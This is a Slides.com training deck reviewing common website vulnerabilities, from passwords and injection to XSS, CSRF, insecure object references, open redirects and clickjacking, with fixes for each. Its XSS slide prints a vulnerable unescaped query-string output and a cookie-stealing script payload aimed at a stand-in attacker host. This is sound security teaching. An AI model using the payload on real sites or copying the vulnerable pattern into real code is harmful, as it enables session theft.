Website Security Refresher

This is a non-exhaustive list

Some of the most common issues

Please chip in comments as we go

 

Passwords

Simplest way to compromise a site is to get hold of someone's password

 

 

Potential fixes

  • Secure password policies
  • 2FA - Authenticator, YubiKey,
    Face ID, Windows Hello, etc
  • Password managers
  • Least privilege permissions
  • SSO/AAD/Google/etc logins

Injection

Injection attacks are common, a lot of framework support for these now. But still need to be aware.

 

Also 2nd order SQL injection or similar can catch you out

 

Potential Fixes

  • Sanitise user inputs, treat all user input as suspicious
  • Build SQL etc view parametrised library functions
  • Least privilege (RO access to DBs etc)

Security Misconfiguration

 

Examples:

  • Allowing source files to be downloaded
  • Leaving ports open
  • Running with custom errors off
  • Leaving debug mode on
  • Directory listing enabled
  • Insecure versions
  • Running unnecessary software on servers
  • Not changing passwords or keys

Sharing sensitive data

 

Examples:

  • Putting private files on public blob
  • Leaving passwords in public GitHub
  • Not encrypting cards/personal details
  • Hashing passwords without salt/simple algorithm
  • Using HTTP
  • Any custom download code is a risk

XSS

Example:
Output a message from QS like

 

?message=Payment failed

Have in the page:

 

<%= Request["message"] %>

 

Change message to

><script>document.location='http://www.attacker.com/cgi-bin/cookie.cgi?foo='+document.cookie</script>

XSS

Potential fixes:

Avoid Html.Raw etc

 

Sanitise user input

Never directly output something a user enters

In the example a set of predefined messages ?message=ERR001

Content Security Policy

 

XSRF/CSRF

Examples:

You're logged into Umbraco, get an email with a link that looks fine. Click the link, which actually submits a form to create a new admin user in your Umbraco.

 

The attacked has used your access to create the user, couldn't do it themselves.

 

Potential Fixes

Anti-Forgery tokens

 

Insecure Direct Object References

Examples:

I view my order at /order/123456

I change the URL to /order/123455 and it shows me someone else's order details

 

Potential fixes:

  • Non-sequential/non-guessable URLs
  • Authenticate the user when showing personal details

Open Redirects

Examples:

  1. Create a fake website looks exactly the same
  2. Place a malicious link in the legit websites URL
  3. User goes to bad website unknowingly

 

Potential fixes:

  • Don't have open redirects on the site
  • Validate redirects to same site only

Click Jacking

Examples:

User puts a transparent layer over the top of the site which is loaded in iframe, you think you're clicking/typing on the site you're typing in their site instead.

 

Potential fixes:

  • X-Frame-Options SAMESITE

Summary

 

 

  • Think about the potential exploits when designing/developing something
  • Certain things should raise red flags: code that downloads files from the system, sequential ids in URLs, roll your own logins. These need extra thought
  • Never trust anything from users, assume all requests are malicious
Made with Slides.com